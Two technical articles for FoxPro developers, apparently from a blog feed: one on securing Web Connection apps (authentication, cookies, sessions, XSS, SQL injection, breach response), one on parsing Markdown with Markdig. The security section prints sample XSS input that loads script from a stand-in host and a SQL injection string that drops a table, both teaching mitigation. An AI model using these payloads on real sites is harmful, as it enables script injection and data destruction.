User Security works by using a Cookie and Web Connection's Session object to track a user, and it use the wwProcess class to expose the relevant user information as properties. You can use properties like Process.lIsAuthenticated to check whether the user is authenticated or Process.cAuthenticatedUser or Process.cAuthenticatedName for the user id and user name respectively. You can also access Process.oUserSecurity.oUser to get access to all of the user data that's stored in the user table if authenticated.

UserSecurity works by using a Cookie and Session State to track the user. This means User Security requires that you turn on Session usage in OnProcessInit():

FUNCTION OnProcessInit
...
InitSession("myApp")
...
ENDFUNC

Extending UserSecurity

The User Security is very simple and very generic and is meant to be used as a base class that you subclass from. At the very least I recommend you create a subclass for every application and change the table name to something specific to your application.

DEFINE CLASS TT_Users AS wwUserSecurity

calias = "tt_users"
cfilename = "tt_users"

ENDDEFINE

This now uses the users table as tt_users.dbf instead of UserSecurity.dbf. Why do this? It'll make it very clear what's stored in the user table, but it also avoids conflicts with other applications or even the Web Connection sample which also uses a UserSecurity table of its own.

The most common thing you'll do in a wwUserSecurity subclass is to override the Authenticate method. If you need to authenticate against a table in your application, or maybe some other object service like ActiveDirectory, you can do that by simply overriding the Authenticate() method. It takes a username and password and you can customize your 'business logic' here to provide custom authentication.

DEFINE CLASS TT_Users AS wwUserSecurity

FUNCTION Authenticate(lcUsername, lcPassword)

* Custom Lookup against SQL Server
llResult = SomeOtherLookupRoutine()

RETURN llResult
ENDFUNC

ENDDEFINE

You can of course also override any of the other methods in the class, so it's possible to for example change wwUserSecurity to use SQL Server or MongoDb as a data store.

Overriding the Web Connection Authentication Processing

Above I've described overriding business logic which is the core of data access. In addition to that you can also override the Web application flow. You can:

Override the Authentication Rendering

You can use the OnShowAuthenticationForm() method to provide custom rendering. This might be as simple as pointing at a different template, or completely writing code to show a the Login UI.

In your wwProcess subclass:

FUNCTION OnShowAuthenticationForm(lcUserName, lcErrorMsg)
Response.ExpandScript("~\views\MyGreatlogin.wcs")
Override the User Authorization Process

The most common thing people will want to do is to override the authentication itself. As mentioned you can do this also by overriding wwUserSecurity.Authenticate() but you can also do it in the process class.

This is the default implementation and realistically you can replace this code and return .t. or .f. with our own.

For example, on my MessageBoard I use a separate user table to login users so I completely replace the Process.OnAuthenticateUser() method:

FUNCTION OnAuthenticateUser(lcEmail, lcPassword, lcErrorMsg)

*** THIS IS THE DEFAULT IMPLEMENTATION 
*** To override behavior override this method
IF EMPTY(lcEmail)
   lcEmail = ""
ENDIF 
IF EMPTY(lcPassword)
   lcPassword = ""
ENDIF

loUserBus = CREATEOBJECT("wwt_user")

*** Default implementation is not case sensitive
IF !loUserBus.AuthenticateAndLoad(LOWER(lcEmail),lcPassword)
	*** Set lcErrorMsg to pass back via REF parm
	lcErrorMsg = loUserBus.cErrorMsg
	RETURN .F.
ENDIF	

*** Assign the user
this.cAuthenticatedUser = lcEmail && email
this.cAuthenticatedName = TRIM(loUserBus.oData.Name)

*** Add a custom sessionvar we can pick up on each request
Session.SetSessionVar("_authenticatedUserId",loUserBus.oData.CookieId)
Session.SetSessionVar("_authenticatedName",TRIM(loUserBus.oData.Name))
Session.SetSessionVar("_authenticatedAdmin",IIF(loUserBus.oData.Admin != 0,"True",""))

RETURN .T.
ENDFUNC

In this case I'm setting some custom Session vars that pull relevant information that my UI needs out of the session table. This is quicker than a user look up each time and these values are simply 'cached' once a user is logged in.

Override behavior when User is Validated

You may also want to know whether a user is authenticated or not and if he is perform some additional actions. For example, in many applications it's useful to set some additional easily accessible properties that provide more info on the user such as the user name, an email address that are not stored by default.

In that same application I set a few variables on the Process class ensure I can easily embed information into a login form.

FUNCTION OnAuthenticated()

LOCAL loUser as wwt_user, loData
loUser = CREATEOBJECT("wwt_user")
IF loUser.LoadFromEmail(this.cAuthenticatedUser)
   this.oUser = loUser
   loData = loUser.oData
   loData.LastOn = DATETIME()
   this.oUser.Save()   

   this.cAuthenticatedName = TRIM(loData.Name)
   this.cAuthenticatedUserId = TRIM(loData.CookieId)
   this.lAuthenticatedAdmin = IIF(loData.Admin # 0,.t.,.f.)
ELSE
	*** get our custom properties from Session
	this.cAuthenticatedName = Session.GetSessionVar("_authenticatedName")
	this.cAuthenticatedUserId = Session.GetSessionVar("_authenticatedUserId")
	this.lAuthenticatedAdmin = !EMPTY(Session.GetSessionVar("_authenticatedAdmin"))
ENDIF

ENDFUNC
Overriding Process.Authenticate()

The above methods all are low level functions that are called by the Authenticate() method which acts as a coordinator for various sub-behaviors. If you want to do something really custom for your authentication you can completely override the Authenticate() method altogether.

All of these functions have default implementations and if you do subclass them I recommend you copy the existing method and modify it to fit your needs. You'll be able to see how the base features work and what values they expect as input and what to send as results.

A custom User Security Manager

Please take a look at the separate User Security Manager solution we provide:

Cookies and Sessions

Most applications need to track something about the user after the user has logged in. At minimum you need to track the user's user ID so you can identify the user on the next request. The typical way this is done is by using HTTP Cookies which is a small bit of text that is stored in the browser's internal state storage and that is sent to the server with every request while the cookie is not expired.

Cookies should be used very sparingly and in general you should not store data in cookies, but rather identifiers that link back to content that is identifiable on the server. Cookies are often used in conjunction with server side Session State that provides for the actual 'data' stored that is related to the user cookie.

The idea is that cookies are references to data that the server needs in order to identify a user and provide commond default functionality. For example, you need to track a logged in user, so that you can display the account information for that specific user after the user has logged in. If it weren't for cookies that identifying id would have to be passed by every request explicitly on the URL query string or form buffer. So to make this easier browsers provide a Cookie interface.

Cookies are set by the server and persisted by the client and sent to the server on any subsequent server request.

You can look at the cookies you are using in any of the browser DevTools:

Notice that most of the values stored there are single value identifiers. Also note that there can be many cookies and in the figure above most of the cookies are actually 3rd party cookies (from Google Analytics and AdWords specifically)

Cookies are tied to a specific domain and have an expiration date if specified. By default Cookies persist for the duration of the browser session. Shut down the session kills the Cookie. You can explicitly set an expiration date though and the cookie then persists until that date in this browser.

You can create cookies in Web Connection with the Response.AddCookie() function:

Response.AddCookie("wwmsgbrd",loUser.Id,"/",Date() + 5,.t.,.t.)

You pass:

  • A cookie name
  • A string value
  • A path: this defaults to the root of the site
    (you should never use a different value for this!)
  • An optional expiration date (or .F.)
  • HttpOnly Cookie
  • Secure HTTPS based Cookie only

The llHttpOnly flag determines that the cookie cannot be accessed from code, meaning it's not JavaScript hackable. It's a good idea to always use this feature unless you explicitly need the cookie to be accessed in JavaScript which should be very rare.

The llHttpsOnly makes it so that cookies are not set or sent when requests are not running over HTTP which prevents potential hacking of cookies in man-in-the-middle attacks. If you run your site only using HTTPS it's a good idea to enable this flag.

Although it's tempting to never expire cookies when persisting them, it's generally not a good idea to use long expiration times. Instead keep the expiration times to a few days max and allow for refreshing the cookie when a user comes back. Web Connection Session state automatically does rolling renewals as you access a site for persisted cookies.

Session Storage - Server Side State

Related to Cookies are Sessions, which store the active user's state on the server in a table. Cookies are meant to just hold identifiers, and a common use case for cookies is a Session Id that maps the cookie to a Session id on the server.

Web Connection's Session object

Web Connection's wwSession Class uses a single cookie to link a Session table to a client side cookie. So rather than having a bunch of cookies on the client that hold information like Username, last on, and other info, that data can be stored on the server and read by the server side application. This is good because it doesn't make any of this potentially sensitive information available in the browser in a persistent fashion where it might be compromised. Instead Sessions store the key value pairs in a table on the server.

Sessions are easy to use but they do have to be enabled explicitly. To do that you can calle Process.InitSession() - typically in Process::OnProcessInit() - to enable them:

FUNCTION OnProcessInit

*** all parms are optional
*** wwDemo Cookie, 30 minute timeout, 
*** don't persist cookie across browser sessions
THIS.InitSession("wwDemo",1800,.F.)
...
RETURN

If you're using Authentication using wwUserSecurity as described earlier SessionState is automatically enabled in its default mode. I still recommend you explicitly configure Sessions as shown above for more control over how Sessions are configured.

Once sessions have been set up you can set Session variable using Session.SetSessionVar() and Session.GetSessionVar():

FUNCTION YourProcessMethod

lcSessionVar = Session.GetSessionVar("MyVar")
IF EMPTY(lcSessionVar)
   *** Not set
   Session.SetSessionVar("MyVar","Hello from a session. Created at: " + TIME())
   lcSessionVar = Session.GetSessionVar("MyVar")
ENDIF

THIS.StandardPage("Session Demo","Session value: " + lcSessionVar)
RETURN
What to use Session for

Common Application related things to store in SessionStorage are:

  • User name
  • Email address (for Gravatar links for example)
  • Last access date for features
  • Simple preferences
  • anything that needs to persist and doesn't fit a typical business object

The advantage of Session storage is that it's often quicker to retrieve Session data than to pull that same data out of one or more business objects. Sessions values are good for values that are user specific but don't fit into user specific business objects - usually related around operational values that have to do with preferences and site settings.

Although you can use Sessions to store this there's no requirement for this. You might also directly access a user table and user record that holds similar information in a more strongly typed format of a class with properties. But that's up to you.

It's important to make sure Sessions and Cookies don't persist forever. It's good to allow keeping them alive with an explicit Remember Me option, but make sure that you don't expire the cookies too far in the future. While the cookie or session are valid it's possible to just get into a site for example, and you don't want unauthorized access from accidental physical access or worse a physically compromised machine.

If you need to perist cookies/sessions keep it to a few days max and instead rely on rolling updates. Rolling updates refresh the cookie after each use and persist the cookie out for another timeout period. wwSession does this automatically, so there never should be a reason to have really long sessions timeouts. For 'persistent' sessions using a few days max is probably a good call. Session uses 5 days in advance to remember you. If you use the site that infrequently then it's probably Ok to force a new login. But if you are frequent user that accesses the site every day you probably appreciate not having to login each time.

Locking Down Web Connection

There are two areas of concern when it comes to locking down Web Connection:

  • Your Application
  • Web Connection Administration Tools

Application

A Web Connection application is your's to manage and the wwUserSecurity and wwProcess security I discussed in the last section is what's needed to lock down your application.

You can block requests to individual requests using Authenticate(), or if you want to be more granular you can look at the Process.oUserSecurity object for more specific rules to display or hide fields and other features.

How any of this works, depends entirely on the requirements of the application.

Web Connection Admin Security

For the administration end of things there are two things that need to be locked down:

  • The admin/Admin.aspx Page
  • Web Connection .NET or ISAPI Handler Administration

These two pages contain very sensitive operations that let you change the application's system behavior that can take down your site.

For this reason it's very important to make sure these pages are not accessible.

Start by removing IUSR_ rights from the admin folder in your Web Connection site. This disallows anonymous access and essentially forces a login to any physical pages in that folder.

Next make sure that the AdminAccount key in web.config or wc.iniis not empty. This account is used to protect the Handler admin page and if it is not set the page is openly accessible. By default this value is set to ANY which means any authenticated user can access the page, but it's better to apply a specific account or comma delimited accounts that can access the page.

Script Attacks

One common attack vector for hackers is to try to hack scripts and dynamic code generation code by 'injecting' malicious code into user input. Any site that takes user input has to be very aware of how that input might be displayed later.

Always be wary of data that is entered and then displayed back to users. There are a number of different attacks but the most popular even to this day are:

  • Cross Site Scripting (XSS) Attacks
  • Sql Injection Attacks

Cross Site Script (XSS) Attacks

Cross site scripting gets its name from the idea that almost any code that manages to get injected into a page, ends up sending data to another site, thereby stealing potentially sensitive data.

What is XSS?

XSS works through user input and injecting script code into the input in hopes that the site operator doesn't properly sanitize their input. The problem with input is that if you simply echo back raw HTML tags as is without Sanitizing them these HTML tags will render as - well HTML. The problem is that HTML also has support for script execution in a number of ways and if a black hat can plant a bit of script code into user input that is then displayed to all users who get to see his user input - somebody just won at XSS Bingo!

So say, you are running a message board like I do and you take raw user input. Lets say I allow users to type plain text or markdown. Now our Fred Hacker comes along and types this into my simple <textara>

Hey, 

Cool Site.

<script>alert('gotcha!')</script> <script src="https://gotcha.com/evilMindedWizard.js"></script>

Like what you've done here. Come check out 
<a href="javascript: alert('gotcha')>my site</a><div style="padding: 20px;opacity: 0" onmouseover="alert('mouse gotcha');"></div>

If I capture that content with Request.Form() then write it to a database, then later display it to my users as is like this:

<%= poMessage.Message %>

I'll be in for a rude awakening. Now everytime the page with this message loads for other users browsing the this site they see alert boxes popping up. And of course that's pretty benign - more likely a large block of code would be used to high jack browser cookies and potentially other sensitive content on the page and send it to another site.

I'll end up with script code executing those first two scripts when the page loads, the javascript: code when I click the link, the mouse hover when I hover over the invisible <div> area. Not cool!

HTML Encoding

Luckily it's fairly easy to mitigate script embedding by ensuring that content is HTML Encoded. So rather than writing the message out in raw form I can write it out as:

<%= EncodeHtml(poMessage.Message) %>

or

<%: poMessage.Message %>

Both encode the message text which effectively replaces the < and > tag into HTML entities that aren't executed as script. Note that the <%: %> syntax is relatively new and it basically does the exact same thing as the command above.

HTML Sanitation

Another option is to clean up user input by sanitizing it and removing script capable code rather than HTML encoding. This might be necessary if you're capturing user input as Markdown for example, and then echo the result back which might include embedded HTML - including script tags. Html Encoding this content wouldn't work because it would encode the potentially desired embedded HTML text.

So rather than HtmlEncoding I can call the new SanitizeHtml() function (in wwutils.prg which calls into wwDotnetBridge) which essentially strips script tags, iframes, forms and a few other elements, javascript: directives and onXXX events from elements.

This:

<%: SanitizeHtml(poMessage.Message) %>

allows for HTML in the content, but strips anything that can potentially run as script.

SQL Injection

SQL Injection has been around for as long as there has been a SQL language and while SQL Injection has received a lot of bad publicity over the years there's still a lot of Web traffic that tries to exploit SQL injection attacks via URLs or user input.

SQL Injection works on the assumption that user input is directly passed from the query string or form variable input into a statement that manually tries to build a SQL string by building SQL queries or commands and embedding static string values as query parameters.

Never, ever build literal strings for SQL code:

lcSql = [select * from Messages where id = '] + lcId + [']

The problem with the above code is that somebody could pass:

"123';drop table Messages;set x = '1111"

The command would end up as:

select * from Messages where id = '123';drop table Messages; set x = '111'

If you pass that string to a SQL server it's not going to be a happy day. Now an attacker would have to know something about the table structure, the type of database used, but there are many hacks, but still... it's easy to do damage with this kind of code.

Don't ever write static string values into string based SQL Statements. Never, Ever!

The simple solution is use named parameters or variables:

lcSql = [select * from Messages where id = ?lcId]
lcSql2 = [select * from Messages where id = lcId]

Note that this is mostly a problem if you are executing SQL backend commands. FoxPro data tends to be accessed directly with variables so this is less of an issue with Fox data, but if you're using a SQL Server or MySql or any other SQL backend this is important.

Checking for Hacks

If you suspect you've been hacked, how do you know?

The best way to check is by going into the logs, and there are two key logs you can go to:

  • IIS Request Logs
    The IIS log logs every single request into the Web Server and as you might expect this log can be ginormous. Every page, image, css, script etc. is logged and these log files can be really unwieldy to work with.

To make things a little bit easier you might look at a log parsing tool like Log Parser Lizard GUI which allows you to query logs using a SQL like language. It's very powerful and beats the hell out of manually digging through logs. This tool as a front end to Microsoft LogParser and it works not just with IIS logs but various other Windows log files like the Event log for example.

Attacks usually start with probing your server to find vulnerabilities so looking through the logs for errors is usually a good start to see patterns that hackers are using to attack your site. It's useful to set up monitoring to get notified on errors. This can be annoying, but it it can be a life saver if there ever is a problem and you see it in the making rather than in the read view mirror.

Responding to Getting Hacked

So it's happened. You got hacked. Somebody got in and you lost some data. Now what?

If you know you got compromised the first step is to try and find out if it's still happening and to make sure that the problem isn't still ongoing. There's nothing worse than compromising information and continuing to leak it. This may not be easy to figure out but if you are not sure it's best to shut down your site until you can resolve either what's happened.

It's better to be down, than continuing to leak

If your servers were compromised and system access was obtained from the outside, the only sensible solution at that point is to try to spin up a new machine and move your data over to that machine. Once system level access is lost there's really no good way to ensure that there isn't some bit of malware still on the system that might be telegraphing out data.

If your data was corrupted that might be worse because you can't just pack up and start over. Your only option in that case is to go back to a previous backup.

That brings up an important point:

Back up your Data!

Have a backup strategy that lets you get your data back to a sensible point in time. Make sure you have rolling backups that provide you multiple time staggered sets of backups in case recent backups have also been corrupted.

Disclose

If your data got hacked and you leaked sensitive data, you are required to report the incident to the authorities and to the affected parties. Not only is it required by law but it's also common decency so that those affected can take potential action to prevent further damage from the compromised data.

It may not always be possible to ascertain exactly what data was leaked, so disclosure has to be made to every potentially affected customer. It's certainly a bad step to have to take, and sure to piss your customers off, but it's a 1000 times worse if you hide the knowledge and it comes out later through an investigation or a whistle blower. It's way better to get out front of it right when it happens than trying to draw out the pain.

Think about how often have we have heard about data breaches in the news and think about which companies make the best impression when this happens - it's those that come out right away admit their failure and describe what they are doing to mitigate. Compare that to the dead beats that hide it, are found out and eventually are slapped with a heavy fine. Which company do you think is more likely to bounce back from a data breach?

Closing

Let's hope a breach or system compromise never happens, but it's always a possibility. I write this bit here at the very end of this long paper in hopes that it will scare you into action of thinking security, not as an afterthought but as an integral part of the application building process. Security is something that's much easier to build in from the beginning than trying to bolt on at the end.

If you have mission critical applications, especially those that hold sensitive or valuable data, make sure you take security very seriously. Security is a very complex and large field and if you as a developer feel overwhelmed you're not alone. If you don't know or feel you don't understand all the issues, it's a good idea to bring in outside help for security consulting or even hire an internal person who's responsibility it is to audit the hardware, network and application to ensure (as much as is possible) that security protocols are followed.

Let's make sure that hackers don't have an easy time getting into your site...

Summary

Security is a complex topic and there's much more to it than what I describe here. What I've focused on in this document are the most common and also Web Connection centric issues that you need to worry about, that are geared to the typical developer who needs to manage his or her own application without the support of a dedicated IT department.

If you are dealing with highly sensitive data, you will no doubt be required to have your software audited and likely will have to rely on security experts to help with that process. Even if not it's often a good idea to bring a security specialist to work with you through threat analysis to find and address any security issues. No amount of generic tooling or setting of configuration options is going to be an automatic guarantee that your application is secure, but it requires some fore-thought and testing to ensure that both the operating environment are secure.

I hope this article has at minimum given you a good starting point on what to look for and make your apps more secure...

Resources

this post created and published with Markdown Monster

Marking up the World with Markdown and FoxPro

$
0
0

prepared for:Southwest Fox 2018
October 1st, 2018

Markdown has easily been one of the most influential technologies that have affected me in the last few years. Specifically it has changed how I work with documentation and a number of documents both for writing and also for text editing and content storage inside of applications.

Markdown is a plain text representation of HTML typically. Markdown works using a relatively small set of easy to type markup mnemonics to represent many common document centric HTML elements like bold, italic, underlined text, ordered and unordered lists, links and images, code snippets, tables and more. This small set of markup directives is easy to learn and quick to type in any editor without special tools or applications.

In the past I've been firmly planted in the world of rich text editors like Word, or using a WYSIWYG editor on the Web, or for Blog Editing using something like Live Writer which used a WYSIWYG editor for post editing. When I first discovered Markdown a number of years ago, I very quickly realized that rich editors, while they look nice as I type, are mostly a distraction and often end up drastically slowing down my text typing. When I write the most important thing to me is getting my content onto the screen/page as quickly as possible and having a minimal way to do this is more important than seeing the layout transformed as I type. Typing text is oddly freeing, and with most Markdown editors is also much quicker than using a rich editor. I found that Markdown helped me in a number of ways to improve my writing productivity.

Pretty quickly I found myself wishing most or all of my document interaction could be via Markdown. Even today I often find myself typing Markdown into email messages, comments on message boards and even into Word documents where it obviously doesn't work.

For me Markdown was highly addictive. I wanted Markdown in all the places!

Today I write most of my documentation for products and components using Markdown. I write my blog posts using Markdown. The West Wind Message Board uses Markdown for messages that users can post. I enter product information in my online store using - you guessed it - Markdown. This document you're reading now, was written in Markdown as well.

I work on three different documentation tools and they all use Markdown, one with data stored in FoxPro tables, the others with Markdown documents on disk. Heck I even wrote a popular Markdown Editor called Markdown Monster to provide an optimized editing experience, and it turns out I'm not alone in using Markdown with some cool support features that I can build myself because Markdown is a non-proprietary format that can be easily enhanced because it's easy to simple inject text into a text document.

What is Markdown?

I gave a brief paragraph summary of Markdown above. Let me back this up with a more thourough discussion of what Markdown is. Let's start with a quick look at what Markdown looks like here inside of a Markdown editor that provides syntax highlighting for Markdown:

There are of course many more features to Markdown, but this gives you an idea what Markdown content looks like. You can see that the Markdown contains a number of simple formatting directives, yet the document you are typing is basically text and relative clean. Even so you are looking at the raw Markdown which includes all of the formatting information.

And this is one of the big benefits of Markdown: You're working with text using the raw text markup format while at the same time working in a relatively clean document that's easy to type, edit and read. In a nutshell: There's no magic hidden from you with Markdown!

Let's drill into what Markdown is and some of the high-level benefits it offers:

HTML Output Based

Markdown is a plain text format that typically is rendered into HTML. HTML is the most common output target for Markdown. In fact, Markdown is a superset of HTML and you can put raw HTML inside of a Markdown document.

However there are also Markdown parsers that can directly create PDF documents, ePub books, revealJS slides and even WPF Flow Layout documents. How Markdown is parsed and used is really up to the Parser that is used to turn Markdown into something that is displayed to the user. Just know that the initial assumption is that they output is HTML. For the purpose of this document we only discuss Markdown as an HTML output renderer.

Although Markdown is effectively a superset of HTML - it supports raw HTML as part of a document - Markdown is not a replacement for HTML content editing in general. Markdown does great with large blocks of text based such as documentation, reference material, or on Web sites for informational content like About pages, Privacy Policies and the like that are mostly text. Markdown's markup can represent many common writing abstractions like bold text, lists, links, images etc. but the markup itself outside of raw HTML doesn't have layout support. IOW, you can't easily add custom styling, additional HTML <div> elements and so on. Markdown is all about text and few most-used features appropriate for text editing.

Plain Text

One of the greatest features of Markdown is that it's simply plain text. This means you don't need a special editor to edit it. Notepad or even an Editbox in FoxPro or a <textarea> in a Web application is all you need to edit Markdown. It works anywhere!

If you need to edit content and want to create HTML output, Markdown is an easy way to create that HTML output by using a Markdown representation of it as plain text. Markdown is text centric so it's meant primarily for text based documents.

Markdown offers a great way to edit content that needs to display as HTML. But rather than editing HTML tag soup directly, Markdown lets you write mostly plain text with only a few easy to remember markup text "symbols" that signify things like bold and italic text, links, images headers and lists and so on. The beauty of Markdown is that it's very readable and editable as plain text, and yet can still render nice looking HTML content. For editing scenarios it's easy to add a previewer so you can see what you're typing without it getting in the way of your text content.

Markdown makes it easy to represent text centric HTML output as easily typeable, plain text.

Simplicity

Markdown is very easy to get started with, and after learning less than a handful of common Markdown markup commands you can be highly productive. Most of the mark up directives feel natural because a number of them have already been in use in old school typesetting solutions for Unix/Dos etc. For the most part content creation is typing plain text with a handful of common markup commands - bold, italic, lists, images, links are the most common - mixed in.

Raw Document Editing

With Markdown you're always editing the raw document. The big benefit is you always see what the markup looks like because you are editing the raw document not some rendered version of it. This means if you use a dedicated Markdown Editor that helps embedding tags for you you can see the raw tags that are embedded as is. This makes it easy to learn Markdown because even if you use editor tooling you immediately see what that tooling does. Once you get familiar, many markdown 'directives' are quicker to simply type inline rather than relying on hotkeys or toolbar selections.

Productivity

Markdown brings big productivity gains due to the simplicity involved in simply typing plain text and not having to worry about formatting while writing. To me (and many others) this can't be overstated. I write a lot of large documents and this this is a s a minimalist approach. But to me this greatly frees my mind from unneeded clutter to focus on the content I'm trying to create.

Edit with any Editor or Textbox

Because Markdown is text, you don't need to use a special tool to edit it - any text editor, even NotePad will do, or if you're using it in an application a simple textbox does the trick in desktop apps or Web apps. It's also easy to enhance this simple interface with simple convenience features and because it's just plain text it's also very easy to build custom tooling that can embed complex text features like special markup, equations or publishing directives directly into the document. This is why there is a lot of Markdown related tooling available.

Easy to Compare and Share

Because Markdown is text it can be easily compared using Source Control tools like Git. Markdown text is mostly content, unlike HTML so source code comparisons aren't burdened by things HTML tags or worse binary files like Word.

Fast Editing

Editing Markdown text tends to be very fast, because you are essentially editing plain text. Editors can be bare bones and don't need to worry about laying out text as you type, slowing down your typing speed. As a result Markdown editors tend to feel very fast and efficient without keyboard lag. Most WYSIWYG solutions are dreadfully slow for typing (the big exception being Word because it uses non-standard keyboard input trapping).

Developer Friendly

If you're writing developer documentation one important aspect is adding syntax colored code snippets. If you've used Word or a tool that uses a WYSIWYG HTML editor you know what a pain it can be for getting properly color coded code into a document.

Markdown has native support for code blocks as part of Markdown syntax which allows you to simply paste code into the document as text and let the Markdown rendering handle how to display the syntax. The generated output for code snippets uses a commonly accepted tag format:

<pre><code class="language-html">
lcId = SYS(2015)</code></pre>

There are a number of JavaScript libraries that understand this syntax formatting and easily can turn this HTML markup in syntax highlighted code. I use highlightJS - more on that later.

Markdown Transformation

Markdown is a markup format which means, that it is meant to take Markdown text and turn it into something else. Most commonly that something else is HTML, which can then be used for other things like PD, Word or EPub document creation using additional and widely available tools.

Markdown has many uses and it can be applied to a number of different problem domains:

  • General document editing
  • Documentation
  • Rich text input and storage in applications
  • Specialized tools like note editing or todo lists etc.

If you're working in software and you're doing anything with open source, you've likely run into Markdown files and the ubiquitous readme.md files that are used for base documentation of products. Beyond that most big companies are now using Markdown as their primary documentation writing format.

What problem does Markdown Solve?

At this point you may be asking yourself: I've been writing for years in Word - what's wrong with that? or I use an WYSIWYG HTML Editor in my Web Application for rich text input, so what does Markdown provide that these solutions don't?

There are several main scenarios that Markdown (and also other markup languages) addresses that make it very useful.

Text Based

First Markdown is text based which means you don't need special tooling to edit a markdown file. You don't need Word or some HTML based editor to edit markdown. You can use NotePad or a plain HTML text box to write and edit Markdown text and because the Markdown features are very simple text 'markup directives' even using a plain textbox lets you get most of the job done.

You can also use specialized editors - most code editors like Visual Studio Code, Notepad++ or Sublime text all have built in support for Markdown syntax coloring and some basic expansion. Or you can use a dedicated Markdown Editor like my own Markdown Monster.

Using Markdown in FoxPro

In order to use Markdown in any environment you need to use a Markdown parser that can convert Markdown into HTML. Once it's in HTML you need to use the HTML in manner that is useful. For Web applications that usually is as easy as embedding the HTML into a document, but there are number of different variations.

In desktop applications you often need a WebBrowser control or external preview to see the Markdown rendered in a useful way.

Markdown Parsing for FoxPro

The best option for Markdown Parsing for FoxPro is to use one of the many .NET based Markdown parsers that are available. I'm a big fan of the MarkDig Markdown Parser because it includes a ton of support features like Github flavored Markdown that is generally used, various table formats, link expansion, auto-id generation and fenced code blocks out of the box. Markdig is also extensible so it's possible to create custom extensions that can be plugged into Markdigs Markdown processing pipeline.

To access this .NET component from FoxPro I'm going to use wwDotnetBridge. There are a couple of different ways to deal with Markdown parsing, but lets start with the simplest which is just to use the built-in 'just do it' function that Markdig itself provides:

do wwDotNetBridge
LOCAL loBridge as wwDotNetBridge
loBridge = GetwwDotnetBridge()
loBridge.LoadAssembly("Markdig.dll")

TEXT TO lcMarkdown NOSHOW
# Markdown Sample 2
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3

Great it works!

> ###   Examples are great> This is a block quote with a header

Here's a quick code block

```foxpro
lnCount = 10
FOR lnX = 1 TO lnCount
   ? "Item " + TRANSFORM(lnX)
ENDFOR
ENDTEXT

lcHtml = loBridge.InvokeStaticMethod("Markdig.Markdown","ToHtml",lcMarkdown,null)
? lcHtml
RETURN

Markdown Output

This is the raw code to access the Markdig dll and load it, then call the MarkDig.Markdown.ToHtml() function to convert the Markdown into HTML. It works and produces the following HTML output:

<h1>RAW MARKDOWN WITH Markdig</h1><p>This is some sample Markdown text. This text is <strong>bold</strong> and <em>italic</em>.</p><ul><li>List Item 1</li><li>List Item 2</li><li>List Item 3</li></ul><p>Great it works!</p><blockquote><h3>Examples are great</h3><p>This is a block quote with a header</p></blockquote>

which looks like this:

Keep in mind that Markdown rendering produces an HTML Fragement which doesn't look very nice because it's just HTML without any formatting applied. There's no formatting for the base HTML, and the code snippet is just raw text. To make this look a bit nicer we need to apply some formatting.

Here's that same HTML fragment rendered into a full HTML page with Bootstrap, highlightJs and a little bit of custom formatting applied:

This looks a lot nicer. The idea of this is to use a small template and merge the rendered HTML into it. Here's some code that uses a code based template (although I would probably store the template as a file and load it for customization purposes):

Here's the template:

<!DOCTYPE html><html><head><title>String To Code Converter</title><link href="https://unpkg.com/bootstrap@4.1.3/dist/css/bootstrap.min.css" rel="stylesheet" /><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"><style>
        body, html {
            font-size: 16px;
        }
        body {
            margin: 10px 40px;
        }
        blockquote {
		    background: #f2f7fb;
		    font-size: 1.02em;
		    padding: 10px 20px;
		    margin: 1.2em;
		    border-left: 9px #569ad4 solid;
		    border-radius: 4px 0 0 4px;
		}
        @media(max-width: 600px) 
        {
            body, html {
                font-size: 15px !important;
            }
            body {
                margin: 10px 10px !important;                
            }
        }</style></head><body><div style="margin: 20px 5%"><%= lcParsedHtml %></div><script src="https://weblog.west-wind.com/scripts/highlightjs/highlight.pack.js" type="text/javascript"></script><link href="https://weblog.west-wind.com/scripts/highlightjs/styles/vs2015.css" rel="stylesheet" type="text/css" /><script>
		function highlightCode() {
		    var pres = document.querySelectorAll("pre>code");
		    for (var i = 0; i < pres.length; i++) {
    		    hljs.highlightBlock(pres[i]);
	    	}
		}
		highlightCode();</script>	</body></html>

and here is the code that parses the Markdown and merges into the template. Notice the <%= lcParsedHtml %> tag that is responsible for merging the parsed HTML into the template

DO MarkdownParser

TEXT TO lcMarkdown NOSHOW
# Markdown Sample 2
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3

Great it works!

> ###   Examples are great> This is a block quote with a header

ENDTEXT

lcParsedHtml = Markdown(lcMarkdown,2)
? lcParsedHtml

lcTemplate = FILETOSTR("markdownpagetemplate.html")

*** Ugh: TEXTMERGE mangles the line breaks for the code snippet so manually merge
lchtml = STRTRAN(lcTemplate,"<%= lcParsedHtml %>",lcParsedHtml)
showHtml(lcHtml)

Beware of TEXTMERGE

FoxPro's TextMerge command can have some odd side effects - when using << lcParsedHtml >> in the example above, TEXTMERGE mangled the line breaks running text together instead of properly breaking lines based on the Markdown \n linefeed only output. When merging output from an Markdown parser into an HTML document, explicitly replace the content rather than relying on TEXTMERGE.

Using the underlying Parsing

The Markdown() function is very easy and it uses a cached instance of the parser so the Markdown object doesn't have to be configured for each use. If you want a little more control you can the underlying MarkdownParser class directly. This is a little more verbose but gives a little more control.

TEXT TO lcMarkdown NOSHOW
This is some sample Markdown text. This text is **bold** and *italic*.

* List Item 1
* List Item 2
* List Item 3


<script>alert('Gotcha!')</script>
Great it works!> ####  Examples are great> This is a block quote with a header
ENDTEXT

loParser = CREATEOBJECT("MarkdownParser")
loParser.lSanitizeHtml = .T.
lcParsedHtml = loParser.Parse(lcMarkdown)

? lcParsedHtml
ShowHtml(lcParsedHtml)

There's also a MarkdownParserExtended class that adds a few additional features, including support for FontAwesome Icons via syntax and special escaping of <%= %> which are removed from the document before the Markdown Parser runs so it doesn't interfere with the parser.

Sanitizing HTML

Because Markdown is a superset of HTML, you should treat all Markdown captured from users as dangerous.

Let me repeat that:

User Captured Markdown has to be Sanitized

Any user input you capture from users as Markdown that will be displayed on a Web site later should be treated just like raw HTML input - it should be considered dangerous and susceptible to Cross Site Scripting (XSS) Attacks.

You might have noticed the code above that does:

loParser.lSanitizeHtml = .T.

which enables HTML sanitation of the Markdown before it is returned. This flag force <script> tags, javascript: directives and any onXXXX= events to be removed from the output HTML. This is the default setting and it's always what's used when you call the Markdown() function.

Sanitation should usually be on which is why it's the default, but there are a few scenarios where it makes sense to have this flag off. If you are in full control of the content you might have good reason to embed scripts. For example, I use Markdown for Blog posts and occasional I link to code my own snippets on gist.github.com, which requires <script> tags to embed the scripts.

